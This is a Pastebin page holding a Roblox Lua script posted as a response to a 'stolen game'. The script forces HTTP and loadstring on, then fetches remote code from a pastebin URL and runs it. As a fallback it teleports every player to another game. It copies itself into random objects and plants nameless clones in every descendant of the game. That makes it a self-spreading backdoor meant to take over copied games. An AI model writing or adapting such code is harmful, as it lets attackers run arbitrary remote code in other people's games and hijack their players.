Advertisement
bersendyb1

Script for stolen game from me

May 27th, 2020
1,853
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 2.24 KB | None | 0 0
  1. local Succ, Err
  2. repeat wait()
  3.             Succ, Err = pcall(function()
  4.                     xpcall(function()
  5.                         loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/uWTJrnze"))()
  6.                     end, function(err)
  7.                         xpcall(function()
  8.                             game:GetService("HttpService").HttpEnabled = true
  9.                             loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/uWTJrnze"))()
  10.                         end, function(err)
  11.                             xpcall(function()
  12.                                 game.ServerScriptService.LoadStringEnabled = true
  13.                                 loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/uWTJrnze"))()
  14.                             end, function(err)
  15.                                 xpcall(function()
  16.                                     loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/uWTJrnze"))()
  17.                                 end, function(err)
  18.                                     xpcall(function()
  19.                                         loadstring(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/uWTJrnze"))()
  20.                                     end, function(err)
  21.                                         xpcall(function()
  22.                                             local function Teleport(Player)
  23.                                                 game:GetService('TeleportService'):Teleport(game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/5JEfeyMM"), Player)
  24.                                             end
  25.                                             for _, player in pairs(game.Players:GetPlayers()) do
  26.                                                 Teleport(player)
  27.                                             end
  28.                                             game.Players.PlayerAdded:Connect(function(player)
  29.                                                 Teleport(player)
  30.                                             end)
  31.                                         end, function(err)
  32.                                             local function Teleport(Player)
  33.                                                 game:GetService('TeleportService'):Teleport(5092941599, Player)
  34.                                             end
  35.                                             for _, player in pairs(game.Players:GetPlayers()) do
  36.                                                 Teleport(player)
  37.                                             end
  38.                                             game.Players.PlayerAdded:Connect(function(player)
  39.                                                 Teleport(player)
  40.                                             end)
  41.                                         end)
  42.                                     end)
  43.                                 end)
  44.                             end)
  45.                         end)
  46.                     end)
  47.                 end)
  48. script:Clone().Parent = game.Workspace:GetDescendants()[math.random(1,#game.Workspace:GetDescendants())]
  49. until Succ
  50. -- run on command prompt
  51. local VVR = game.Players.Script
  52. for i, v in pairs(game:GetChildren()) do
  53.     pcall(function()
  54.         for e, r in pairs(v:GetDescendants()) do
  55.             pcall(function()
  56.                 local CloneVVR = VVR:Clone()
  57.                 CloneVVR.Name = ""
  58.                 CloneVVR.Parent = r
  59.             end)
  60.         end
  61.     end)
  62. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement